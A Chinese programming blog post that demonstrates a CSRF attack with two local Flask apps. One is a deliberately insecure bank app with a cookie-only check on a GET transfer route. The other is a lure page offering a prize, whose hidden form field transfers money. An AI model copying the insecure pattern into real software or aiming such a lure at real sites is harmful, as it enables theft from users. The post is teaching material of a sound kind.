csrf攻击与防护—1用flask简单演示csrf攻击

最新推荐文章于 2023-03-10 22:47:43 发布
最新推荐文章于 2023-03-10 22:47:43 发布
阅读量297 收藏 2
点赞数
分类专栏: python3 文章标签: flask csrf python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ACBC12345/article/details/121758113
版权

目录结构
flask_test
|__templates(它包含bank_page.html和page_attack.html)
|__bank.py
|__csrf_attack.py

bank.py

from flask import render_template, Flask, request, jsonify, make_response

app = Flask("haha")
YOUR_BANK_ACOUNT = 1000000000
TOKEN = "0ofjsfnnfgxgxgxgreituto"


@app.route("/")
def root():
    response = make_response(render_template("bank_page.html"))
    #简单设置cookie
    response.set_cookie("token", TOKEN)
    return response


@app.route("/quit")
def quit():
    response = make_response("退出成功!")
    response.delete_cookie("token")
    return response


@app.route("/transfer_money")
def form():
    # 简单验证cookie
    if TOKEN != request.cookies.get("token"):
        print("正遭受攻击!")
        return jsonify({"status": "Fail"})
    global YOUR_BANK_ACOUNT
    cash = int(request.values.get("money"))
    YOUR_BANK_ACOUNT -= cash
    print(f"Transfer {cash} yuan, YOUR_BANK_COUNT left {YOUR_BANK_ACOUNT}")
    return jsonify({"status": "OK"})


if __name__ == "__main__":
    app.run(port=8082)

bank_page.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>main</title>
</head>
<body>
<h1>账户转移!</h1>
<form action="/transfer_money">
transfer_money:<br>
<input type="text" name="money" value="0">
<br>
<br><br>
<input type="submit" value="Submit">
</form>

点击下面链接退出<br>
<a href="quit">quit</a>
</body>
</html>

以下是攻击网站代码
csrf_attack.py

from flask import render_template, Flask, request, jsonify

app = Flask("haha")
G_COUNT = 10000


@app.route("/")
def root():
    return render_template("page_attack.html")


if __name__ == "__main__":
    app.run(port=8083)

page_attack.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>main</title>
</head>
<body>
<h1>抽大奖!</h1>
<form action="http://127.0.0.1:8082/transfer_money">
    <input type="hidden" name="money" value="100000">
    <input type="submit" value="点我抽大奖">
</form>

</body>
</html>

演示步骤:
1.分别运行两个py文件,启动两个web服务器
(以下均在一个浏览器中打开)
2.先访问"http://127.0.0.1:8083/"页面,点击抽大奖按钮,发现返回false,因为没有携带cookie,所以校验不通过!攻击失败!根因是未登陆bank页面,所以没有浏览器中没有相关cookie

3.访问"http://127.0.0.1:8082/"页面,此时浏览器中会存储相关cookie,此时再重复动作2,发现攻击成功!

4.在bank页面点击退出链接,此时再重复动作2,发现攻击失败!原因同2

csrf攻击与防护—2用flask简单演示防范csrf攻击之referer

Dan.Qiao
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flask模拟实现CSRF攻击的方法
09-20
主要介绍了Flask模拟实现CSRF攻击的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
什么是CSRF攻击,如何防范CSRF攻击
weixin_47450807的博客
03-02 6665
什么是CSRF攻击,如何防范CSRF攻击
csrf攻击防护—3用flask简单演示防范csrf攻击之token验证
ACBC12345的博客
12-07 512
csrf攻击防护—2用flask简单演示防范csrf攻击之referer CSRF 攻击之所以能够成功,是因为黑客可以完全伪造用户的请求,该请求中所有的用户验证信息都是存在于 cookie 中,因此黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。要抵御 CSRF,关键在于在请求中放入黑客所不能伪造的信息,并且该信息不存在于 cookie 之中。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求
【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 6004
前面写CTF题目的时候做过几道SSTI模板注入的题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 Flask和Jinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 Flask和Jinja2介绍: 1.Flask是一个轻量级的基于Python的web框架。 2.Jinja 模板只是一个属于.
SpringBoot+SpringSecurity+Thymeleaf 演示CSRF攻击
怪咖@的博客
06-07 2473
1. 通过代码示例来 演示CSRF攻击!2. 通过security给我们提供的保护机制,来进行防止CSRF攻击 3. security防止CSRF的原理
CSRF攻击
秋水的博客
09-04 1315
CSRF攻击原理 什么是csrfCSRF(Cross-site request forgery)跨站请求伪造:也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与X...
Flask框架 CSRF 保护实现方法详解
09-18
主要介绍了Flask框架 CSRF 保护实现方法,结合实例形式详细分析了Flask-WTF针对CSRF攻击防护相关操作技巧,需要的朋友可以参考下
csrf跨站请求伪造简单示例
10-18
一个简单csrf跨站请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
CSRF攻击理解、简单演示与预防
子悠のziyou
10-28 1768
快速理解CSRF攻击原理与预防,并进行了简单演示
flask的pin码攻击——新版本下pin码的生成方式
qq_42303523的博客
04-17 4036
在打*CTF的时候,一道明显是flask的pin码生成进而RCE的题目卡了半天,最后发现是新版本的flask的pin码生成方式有了一定的改变,这里做一下记录。 我们常用的生成pin码的脚本如下: import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', get
Spring Boot项目CSRF (跨站请求伪造)攻击演示与防御
oscar999的专栏
07-17 1339
CSRF ,Cross-site request forgery,跨站请求伪造。是常见的网络攻击的方式之一,2007年曾被列为互联网20大安全隐患之一。攻击过程是攻击者伪造用户的浏览器请求,访问一个用户曾经访问过的网站, 使目标网站误以为是用户的操作而执行命令。 本篇j基于Spring Boot创建项目,用来演示CSRF攻击过程。...
跨站请求伪造(CSRF)漏洞简介及靶场演示
seek_2022的博客
05-10 2554
文章目录一、CSRF漏洞简介(一)什么是CSRF?(二)CSRF的原理(三)CSRF的危害二、CSRF漏洞如何挖掘?三、靶场实战(一)线上搭建环境测试(二)靶场实战四、小结 一、CSRF漏洞简介 (一)什么是CSRFCSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者"Session Riding",通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信
flask总结05(在 Flask 项目中解决 CSRF 攻击
weixin_34095889的博客
04-08 335
一:安装 flask_wtf pip install flask_wtf 二:设置应用程序的 secret_key,用于加密生成的 csrf_token 的值 # session加密的时候已经配置过了.如果没有在配置项中设置,则如下: app.secret_key = "#此处可以写随机字符串#" 三:导入 flask_wtf.csrf 中的 CSRFProtect 类,...
干货!Flask 动态展示 Pyecharts 图表数据的几种方法!
cainiao_python的博客
06-21 5091
本文将介绍如何在 web 框架 Flask 中使用可视化工具 pyecharts, 看完本教程你将掌握几种动态展示可视化数据的方法,不会的话你来找我呀…Flask 模板渲染1. 新建一个项目flask_pyecharts在编辑器中选择 New Project,然后选择 Flask,创建完之后,Pycharm 会帮我们把启动脚本和模板文件夹都建好2. 拷贝 pyechart...
Python Flask API 讲解与示例演示(附cookies和session)
匠人精神,持之以恒!
03-10 351
Python Flask 是一个轻量级的 Web 框架,它提供了一个易于使用的 API 来创建 Web 应用程序。在 Flask 中,我们可以使用 Python 函数来定义 Web 应用程序的路由和处理程序。在 Flask 中,Cookies 和 Session 都是用来跟踪用户状态的机制。Cookie是一小段文本数据,当一个用户访问你的网站时,服务器可以通过设置cookie把一些数据存储在用户的计算机上。当用户再次访问网站时,浏览器会发送cookie数据给服务器,以便服务器可以使用该数据来识别用户。
Python Flask 之 路由和渲染模板讲解与示例演示
匠人精神,持之以恒!
03-06 313
Flask 是一款使用 Python 编写的 Web 应用框架,其设计理念是轻量级和简单易学。Flask 框架的核心思想是将应用程序的各个部分组织成一组小而相互独立的模块,其中路由和模板是其中的重要组成部分。
Flask项目实现防止CSRF攻击的流程
是什么让你停止不前?
10-12 1306
Flask项目实现防止CSRF攻击的流程 a) 使用 flask_wtf 中 CSRFProtect类,初始化该类并传入app b) 使用 flask_wtf.csrf模块中的generate_csrf方法生成csrf_token c) 使用请求勾子 after_request,取到响应,统一设置到cookie中 d) 如果前端使用form表单提交,需要在表单中添加隐藏的input,并设置其va...
表单CSRF攻击验证
最新发布
08-29
这样,当用户提交表单时,后端会验证表单中的csrf_token与cookie中的csrf_token是否匹配,如果不匹配,则认为可能存在CSRF攻击,并拒绝该请求。通过这种验证方式,可以有效地防止CSRF攻击。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值